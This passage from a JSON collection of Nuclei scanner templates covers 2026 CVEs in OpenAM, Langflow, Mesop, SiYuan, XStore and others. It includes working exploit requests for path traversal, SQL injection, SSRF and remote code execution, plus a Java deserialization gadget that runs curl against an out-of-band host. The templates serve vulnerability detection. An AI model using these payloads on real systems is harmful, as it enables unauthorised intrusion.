dsl:\n          - len(body) == 43\n          - status_code == 200\n          - contains(content_type, 'application/octet-stream')\n        condition: and\n# digest: 4b0a004830460221009f21c3740dba3658297bb9c564c09ebd0e8ebd145662e467aab2807d9b3e7d66022100fad9ad39bc05198636c4111ac975bdce9fa3375788ac5c25c7959fdaf4d45767:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-33497.yaml","vuln_id":"cve-2026-33497"},{"raw":"id: CVE-2026-33478\n\ninfo:\n  name: AVideo <= 26.0 - WWBN AVideo - Remote Code Execution\n  author: pussycat0x\n  severity: critical\n  description: |\n    WWBN AVideo <= 26.0 contains multiple vulnerabilities in the CloneSite plugin including unauthenticated exposure of clone secret keys and OS command injection in rsync command construction, letting unauthenticated attackers achieve remote code execution.\n  impact: |\n    Unauthenticated attackers can execute arbitrary system commands, leading to full server compromise.\n  remediation: |\n    Update to the version including commit c85d076375fab095a14170df7ddb27058134d38c or later.\n  reference:\n    - https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: http.html:\"AVideo\"\n    fofa-query: app=\"AVideo-YouPHPTube\"\n  tags: cve,cve2026,avideo,clonesite,unauth,oss,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /plugin/CloneSite/clones.json.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"data\": ['\n          - '\"key\":\"'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: word\n        part: body\n        words:\n          - '\"error\"'\n          - \"Admin required\"\n        negative: true\n        condition: or\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: key\n        group: 1\n        part: body\n        regex:\n          - '\"key\":\"([0-9a-z]+)\"'\n# digest: 4a0a0047304502205a81085a2319ec651de3bebae07fc8ec5d0632d7d32ad22dad3ef064d0ae1b71022100e0e1bee92f2bfc805b4ba7a2df4907333b87d8a1b8e9ad5f0af093a511875455:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-33478.yaml","vuln_id":"cve-2026-33478"},{"raw":"id: CVE-2026-33476\n\ninfo:\n  name: SiYuan <= v3.6.1 - Path Traversal\n  author: WRG-11\n  severity: high\n  description: |\n    SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.\n  impact: |\n    Unauthenticated attackers can read arbitrary files accessible to the server, potentially exposing sensitive information.\n  remediation: |\n    Update to version 3.6.2 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7\n    - https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33476\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-33476\n    epss-score: 0.03256\n    epss-percentile: 0.87802\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,lfi,traversal,exposure\n\nhttp:\n  - raw:\n      - |\n        GET /appearance/langs/../../conf.json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"kernelVersion\"'\n          - '\"logLevel\"'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e3ad07978fd0ac22530cde1608b1fb008c70e6980f1418e122b0fbd6da0a32a102203dfb2dc9055a1ec483622fb709156c09346ba5add0408fc469967fc083abb482:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-33476.yaml","vuln_id":"cve-2026-33476"},{"raw":"id: CVE-2026-33439\n\ninfo:\n  name: OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464.  This vulnerability is fixed in 16.0.6.\n  impact: |\n    An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages).\n  remediation: Upgrade to OpenAM 16.0.6 or later.\n  reference:\n    - https://www.hacktron.ai/blog/openam-deserialization-pre-auth-rce\n    - https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-33439\n    epss-score: 0.10005\n    epss-percentile: 0.95396\n    cwe-id: CWE-502\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: openidentityplatform\n    product: openam\n    shodan-query: http.title:\"OpenAM\"\n    fofa-query: title=\"OpenAM\"\n  tags: cve,cve2026,openam,deserialization,rce,jato,oast,oob\n\nflow: http(1) && javascript(1)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/openam/ui/PWResetUserValidation\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"OpenAM\",\"tfUserAttr\")'\n        condition: and\n        internal: true\n\njavascript:\n  - code: |\n      var net = require('nuclei/net');\n      var P = \"aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200306f72672e6170616368652e636c69636b2e636f6e74726f6c2e436f6c756d6e24436f6c756d6e436f6d70617261746f72000000000000000102000249000d617363656e64696e67536f72744c0006636f6c756d6e7400214c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f436f6c756d6e3b7870000000007372001f6f72672e6170616368652e636c69636b2e636f6e74726f6c2e436f6c756d6e00000000000000010200135a00086175746f6c696e6b5a000a65736361706548746d6c4900096d61784c656e6774684c000a6174747269627574657374000f4c6a6176612f7574696c2f4d61703b4c000a636f6d70617261746f7271007e00014c000964617461436c6173737400124c6a6176612f6c616e672f537472696e673b4c000a646174615374796c657371007e00074c00096465636f7261746f727400244c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f4465636f7261746f723b4c0006666f726d617471007e00084c000b686561646572436c61737371007e00084c000c6865616465725374796c657371007e00074c000b6865616465725469746c6571007e00084c000d6d657373616765466f726d61747400194c6a6176612f746578742f4d657373616765466f726d61743b4c00046e616d6571007e00084c000872656e64657249647400134c6a6176612f6c616e672f426f6f6c65616e3b4c0008736f727461626c6571007e000b4c00057461626c657400204c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f5461626c653b4c000d7469746c6550726f706572747971007e00084c0005776964746871007e000878700001000000007071007e000570707070707070707400106f757470757450726f7065727469657370707372001e6f72672e6170616368652e636c69636b2e636f6e74726f6c2e5461626c65000000000000000102001749000e62616e6e6572506f736974696f6e5a0009686f766572526f77735a00176e756c6c696679526f774c6973744f6e44657374726f7949000a706167654e756d6265724900087061676553697a65490013706167696e61746f724174746163686d656e745a000872656e6465724964490008726f77436f756e745a000a73686f7742616e6e65725a0008736f727461626c655a0006736f727465645a000f736f72746564417363656e64696e674c000763617074696f6e71007e00084c000a636f6c756d6e4c6973747400104c6a6176612f7574696c2f4c6973743b4c0007636f6c756d6e7371007e00074c000b636f6e74726f6c4c696e6b7400254c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f416374696f6e4c696e6b3b4c000b636f6e74726f6c4c69737471007e00104c000c6461746150726f766964657274002c4c6f72672f6170616368652f636c69636b2f6461746170726f76696465722f4461746150726f76696465723b4c000668656967687471007e00084c0009706167696e61746f727400254c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f52656e64657261626c653b4c0007726f774c69737471007e00104c000c736f72746564436f6c756d6e71007e00084c0005776964746871007e0008787200286f72672e6170616368652e636c69636b2e636f6e74726f6c2e4162737472616374436f6e74726f6c00000000000000010200094c000e616374696f6e4c697374656e65727400214c6f72672f6170616368652f636c69636b2f416374696f6e4c697374656e65723b4c000a6174747269627574657371007e00074c00096265686176696f727374000f4c6a6176612f7574696c2f5365743b4c000c68656164456c656d656e747371007e00104c00086c697374656e65727400124c6a6176612f6c616e672f4f626a6563743b4c000e6c697374656e65724d6574686f6471007e00084c00046e616d6571007e00084c0006706172656e7471007e00174c00067374796c657371007e0007787070707070707074000a64756d6d795461626c65707000000002000100000000000000000000000100000000000000000170737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a6578700000000077040000000078737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000100000000078737200236f72672e6170616368652e636c69636b2e636f6e74726f6c2e416374696f6e4c696e6b00000000000000010200015a0007636c69636b6564787200256f72672e6170616368652e636c69636b2e636f6e74726f6c2e41627374726163744c696e6b00000000000000010200075a000864697361626c65645a001372656e6465724c6162656c416e64496d616765490008746162696e6465784c0008696d61676553726371007e00084c00056c6162656c71007e00084c000a706172616d657465727371007e00074c00057469746c6571007e00087871007e001470707070707074001664756d6d795461626c652d636f6e74726f6c4c696e6b71007e0018700000000000007070707000707070707070707070770400000003737200296f72672e6170616368652e78616c616e2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000749000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465784c000b5f617578436c617373657374002a4c6f72672f6170616368652f78616c616e2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00084c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff70757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000003c8cafebabe00000041002907000201000b4f6f625472616e736c657407000401002f6f72672f6170616368652f78616c616e2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100083c636c696e69743e010003282956010004436f64650a0009000b07000a0100116a6176612f6c616e672f52756e74696d650c000c000d01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b07000f0100106a6176612f6c616e672f537472696e670800110100072f62696e2f73680800130100022d6308001501002a6375726c20687474703a2f2f5245504c4143454d455f4f4153545f504c414345484f4c4445525f55524c0a000900170c0018001901000465786563010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b07001b0100136a6176612f6c616e672f5468726f7761626c6501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c650100063c696e69743e0a000300200c001e00060100097472616e73666f726d010050284c6f72672f6170616368652f78616c616e2f78736c74632f444f4d3b5b4c6f72672f6170616368652f786d6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e730700250100286f72672f6170616368652f78616c616e2f78736c74632f5472616e736c6574457863657074696f6e010073284c6f72672f6170616368652f78616c616e2f78736c74632f444f4d3b4c6f72672f6170616368652f786d6c2f64746d2f44544d417869734974657261746f723b4c6f72672f6170616368652f786d6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a536f7572636546696c650100104f6f625472616e736c65742e6a6176610021000100030000000000040008000500060001000700000054000500000000001fb8000806bd000e590312105359041212535905121453b6001657a7000457b100010000001a001d001a0002001c0000000e000300000009001a000a001e000b001d0000000700025d07001a000001001e0006000100070000001d00010001000000052ab7001fb100000001001c000000060001000000060001002100220002002300000004000100240007000000190000000300000001b100000001001c0000000600010000000c0001002100260002002300000004000100240007000000190000000400000001b100000001001c0000000600010000000d000100270000000200287074000b4f6f625472616e736c6574707701007871007e002778\";\n\n      var CMD_OFF = 5114;   // \"curl http://REPLACEME_OAST_PLACEHOLDER_URL\" string start\n      var LEN_OFF = 5110;   // CONSTANT_Utf8 length field (2 bytes, big-endian)\n      var ARR_OFF = 4660;   // byte[] array length for the embedded class file (4 bytes, big-endian)\n      var OLD_LEN = 42;     // Original placeholder string length in bytes\n      var OLD_ARR = 968;    // Original class file size in bytes\n\n      var cmd = \"curl http://\" + interactsh;\n      var delta = cmd.length - OLD_LEN;\n\n      function h(s) {\n        var o = \"\";\n        for (var i = 0; i < s.length; i++) {\n          var c = s.charCodeAt(i).toString(16);\n          o += c.length < 2 ? \"0\" + c : c;\n        }\n        return o;\n      }\n\n      var newHex = h(cmd);\n      var oldHexLen = OLD_LEN * 2;\n      var px = P.substring(0, CMD_OFF) + newHex + P.substring(CMD_OFF + oldHexLen);\n\n      var ul = cmd.length.toString(16);\n      while (ul.length < 4) ul = \"0\" + ul;\n      px = px.substring(0, LEN_OFF) + ul + px.substring(LEN_OFF + 4);\n\n      var al = (OLD_ARR + delta).toString(16);\n      while (al.length < 8) al = \"0\" + al;\n      px = px.substring(0, ARR_OFF) + al + px.substring(ARR_OFF + 8);\n\n      var ba = [];\n      for (var i = 0; i < px.length; i += 2) {\n        ba.push(parseInt(px.substring(i, i + 2), 16));\n      }\n      var T = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";\n      var b = \"\";\n      for (var i = 0; i < ba.length; i += 3) {\n        var a0 = ba[i], a1 = i+1<ba.length?ba[i+1]:0, a2 = i+2<ba.length?ba[i+2]:0;\n        b += T[(a0>>2)&63];\n        b += T[((a0<<4)|(a1>>4))&63];\n        b += i+1<ba.length ? T[((a1<<2)|(a2>>6))&63] : \"=\";\n        b += i+2<ba.length ? T[a2&63] : \"=\";\n      }\n      var payload = b.split(\"+\").join(\"-\").split(\"/\").join(\"_\").split(\"=\").join(\"\");\n\n      var ct = (tport === \"443\") ? \"tls\" : \"tcp\";\n      var conn = net.Open(ct, thost + \":\" + tport);\n      var req = \"GET /openam/ui/PWResetUserValidation?jato.clientSession=\" + payload +\n                \" HTTP/1.1\\r\\nHost: \" + thost + \":\" + tport +\n                \"\\r\\nConnection: close\\r\\n\\r\\n\";\n      conn.SendHex(h(req));\n      var resp = conn.RecvString(4096);\n      conn.Close();\n      Export(resp);\n\n    args:\n      thost: \"{{Host}}\"\n      tport: \"{{Port}}\"\n      interactsh: \"{{interactsh-url}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n# digest: 490a0046304402200ea1dd76d0ae2838c69ab5b6eca8a70052282b8a2a2a6e82dd0a01cdf3ecd79402200aeb5354ac2a908f5bc6245eac499b130c86ebd546aba74d5963e107afcddd8b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-33439.yaml","vuln_id":"cve-2026-33439"},{"raw":"id: CVE-2026-3335\n\ninfo:\n  name: Canto <= 3.1.1 - Missing Authorization to Unauthenticated File Upload\n  author: iamatownboy\n  severity: medium\n  description: |\n    The Canto plugin for WordPress is vulnerable to missing authorization in the copy-media.php upload flow.\n    The file is directly accessible and accepts attacker-controlled parameters for the upload destination, allowing unauthenticated users to upload arbitrary files constrained to WordPress-allowed MIME types.\n    The fbc_app_api parameter controls the domain WordPress fetches from via wp_safe_remote_get, enabling SSRF to attacker-controlled infrastructure.\n  impact: |\n    Unauthenticated attackers can upload files into the WordPress media library by pointing the server-side fetch at an attacker-controlled Canto API. This also enables SSRF via the fbc_app_api parameter.\n  remediation: |\n    Update Canto to version 3.1.2 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3335\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0777f759-6980-4572-a866-0210bd5f5085?source=cve\n    - https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L71\n    - https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L152\n    - https://plugins.trac.wordpress.org/browser/canto/tags/3.1.1/includes/lib/copy-media.php#L306\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-3335\n    epss-score: 0.01142\n    epss-percentile: 0.6526\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: flightbycanto\n    product: canto\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/canto/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,canto,missing-auth,unauth,file-upload,ssrf,oast\n\nvariables:\n  token: \"{{rand_text_alpha(10)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/canto/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"Canto\")\n          - compare_versions(version, \"<= 3.1.1\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-content/plugins/canto/includes/lib/copy-media.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}/\n\n        fbc_id={{token}}&fbc_scheme=image&fbc_flight_domain={{token}}&fbc_app_api={{interactsh-url}}&fbc_app_token={{token}}&chromeless=1\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: attachment\n        part: body\n        group: 1\n        regex:\n          - '\"attachment_id\":(\\d+)'\n# digest: 490a00463044021f37c96eb6e93a76f395e5335310918ab06b5ee5d1a701632f804da8284aaaf70221009a6e08314668e109634e24e0bda834899a3d72065366e5fd3167ed4e6232afd1:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-3335.yaml","vuln_id":"cve-2026-3335"},{"raw":"id: CVE-2026-33340\n\ninfo:\n  name: LoLLMs WEBUI - Server-Side Request Forgery\n  author: theamanrawat\n  severity: critical\n  description: |\n    LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.\n  impact: |\n    Attackers can access internal services, scan local networks, or exfiltrate sensitive cloud metadata, potentially leading to data exposure and further compromise.\n  remediation: |\n    Update to a patched version once available or apply mitigations to restrict server-side requests.\n  reference:\n    - https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33340\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-33340\n    epss-score: 0.21629\n    epss-percentile: 0.97516\n    cwe-id: CWE-306\n  metadata:\n    max-requests: 1\n    verified: true\n  tags: cve,cve2026,lollms,ssrf\n\nhttp:\n  - raw:\n      - |\n        POST /api/proxy HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"url\": \"http://{{interactsh-url}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'contains(body, \"{\\\"content\\\":\\\"\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450220771f5d2f10a72ac4e1b858cf8f403253eb09b52335ea079cd1242e53dd61adc7022100e809022e2d622ce433daeb8c4ceb90b6dd82c6981b900ee5a2ca50ec4529ab9e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-33340.yaml","vuln_id":"cve-2026-33340"},{"raw":"id: CVE-2026-3326\n\ninfo:\n  name: XStore Theme < 9.7.3 - SQL Injection\n  author: VixianSchool\n  severity: high\n  description: |\n    The Xstore WordPress theme before 9.7.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n  impact: |\n    Unauthenticated attackers can extract arbitrary data from the WordPress database, including credentials, session tokens, and WooCommerce customer records.\n  remediation: |\n    Update XStore theme to version 9.7.3 or later.\n  reference:\n    - https://wpscan.com/vulnerability/2c5bdb17-8b12-45b5-878b-627056dc8956/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3326\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-3326\n    epss-score: 0.01866\n    epss-percentile: 0.78368\n    cwe-id: CWE-89\n  metadata:\n    max-request: 2\n    verified: true\n  tags: cve,cve2026,wordpress,wp,wp-theme,sqli,xstore\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/themes/xstore/style.css\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"XStore\"\n        internal: true\n\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \"< 9.7.3\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - 'Version:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 20s\n        GET /?s=test%27)%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20(%27hyMm%27=%27hyMm&et_search=true&post_type=product HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 5'\n          - 'status_code != 404'\n        condition: and\n# digest: 4a0a00473045022100cc03bd75b386c5eadcf9f8a21a53aa435b70da950f1d9534cd1cabe4fffc49a5022078fb00949e055f4c387c5d4cd25b3c6bf14a762db0b6c57cbee739f4d5092d34:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-3326.yaml","vuln_id":"cve-2026-3326"},{"raw":"id: CVE-2026-33057\n\ninfo:\n  name: Mesop AI Sandbox <= 1.2.2 - Remote Code Execution\n  author: sammiee5311,liyander\n  severity: critical\n  description: |\n    Mesop <= 1.2.2 contains an unrestricted remote code execution caused by unauthenticated ingestion and execution of base64-encoded Python code in the /exec-py endpoint of ai/testing module, letting attackers execute arbitrary commands on the host, exploit requires HTTP access to the server.\n  impact: |\n    Attackers can execute arbitrary commands on the host, leading to full system compromise.\n  remediation: |\n    Upgrade to version 1.2.3 or later.\n  reference:\n    - https://github.com/mesop-dev/mesop/security/advisories/GHSA-gjgx-rvqr-6w6v\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33057\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-33057\n    epss-score: 0.05289\n    epss-percentile: 0.92208\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: mesop-dev\n    product: mesop\n    shodan-query: html:\"Mesop\"\n  tags: cve,cve2026,mesop,rce,oss\n\nvariables:\n  marker: \"{{rand_base(16)}}\"\n  payload: '{{replace(replace(base64(concat(\"raise Exception(\\\"\", marker, \"\\\")\")), \"+\", \"-\"), \"/\", \"_\")}}'\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"<title>Mesop\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 20s\n        POST /exec-py HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        code={{payload}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{marker}}\"\n\n      - type: status\n        status:\n          - 500\n# digest: 4a0a0047304502203767477b192934192bee5ad415a678996b8e4700c0f89d4005925c51be7cc69a022100c912637c692b8476eae9b9cba14686b6db84216c367ccf33c73f11cce6298d63:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-33057.yaml","vuln_id":"cve-2026-33057"},{"raw":"id: CVE-2026-33032\n\ninfo:\n  name: Nginx UI - Broken Access Control\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Network attackers can fully control nginx service, including config modification and service restart, leading to complete service takeover.\n  impact: |\n    An unauthenticated attacker with a valid MCP session ID can inject arbitrary nginx configurations,create reverse proxies for credential theft, and achieve remote code execution via nginx config primitives.\n  remediation: Upgrade to nginx-ui v2.3.4 or later which adds AuthRequired() to /mcp_message.\n  reference:\n    - https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf\n    - https://github.com/0xJacky/nginx-ui/commit/413dc631\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33032\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-33032\n    epss-score: 0.36299\n    epss-percentile: 0.98413\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    product: nginx-ui\n    shodan-query: http.title:\"Nginx UI\"\n    fofa-query: title=\"Nginx UI\"\n  tags: cve,cve2026,nginx-ui,mcp,unauth,misconfig,vkev\n\nvariables:\n  string: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /mcp_message HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"jsonrpc\":\"2.0\",\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2024-11-05\",\"capabilities\":{},\"clientInfo\":{\"name\":\"{{string}}\",\"version\":\"1.0\"}},\"id\":1}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"jsonrpc\":'\n          - '\"message\":'\n          - '\"id\":'\n        condition: and\n\n      - type: status\n        status:\n          - 400\n# digest: 4b0a00483046022100cafa97760823564577001d44608b65210389b4885210ba317536ad781cb17f58022100819a885e5abe9384de7b506f917d36e670e056ea4288fa49095f826994b01667:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-33032.yaml","vuln_id":"cve-2026-33032"},{"raw":"id: CVE-2026-33017\n\ninfo:\n  name: Langflow < 1.9.0 - Remote Code Execution\n  author: himind\n  severity: critical\n  description: |\n    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.\n  impact: |\n    Remote attackers can execute arbitrary Python code without authentication, leading to full system compromise.\n  remediation: |\n    Update to version 1.9.0 or later.\n  reference:\n    - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html\n    - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33017\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-33017\n    epss-score: 0.96177\n    epss-percentile: 0.99876\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: langflow\n    product: langflow\n    shodan-query: http.favicon.hash:1727196746\n  tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev\n\nvariables:\n  uuid: \"{{uuid}}\"\n\nflow: http(1) && (http(2) || http(3))\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"langflow\"\n        case-insensitive: true\n\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/v1/build_public_tmp/{{uuid}}/flow\"\n\n    body: |\n      {\n        \"data\": {\n          \"nodes\": [\n            {\n              \"data\": {\n                \"node\": {\n                  \"template\": {\n                    \"code\": {\n                      \"value\": \"def function():\\n    import os\\n    return os.popen('id').read()\"\n                    }\n                  }\n                }\n              }\n            }\n          ]\n        }\n      }\n    headers:\n      Content-Type: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/json\")'\n          - 'regex(\"uid=[0-9]+.*gid=[0-9]+.*\", body)'\n          - 'contains(body, \"xmsg\\\":\")'\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/version\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"compare_versions(version, '< 1.9.0')\"\n          - \"status_code == 200\"\n        condition: and\n\n    extractors:\n      - type: json\n        name: version\n        json:\n          - \".version\"\n        internal: true\n# digest: 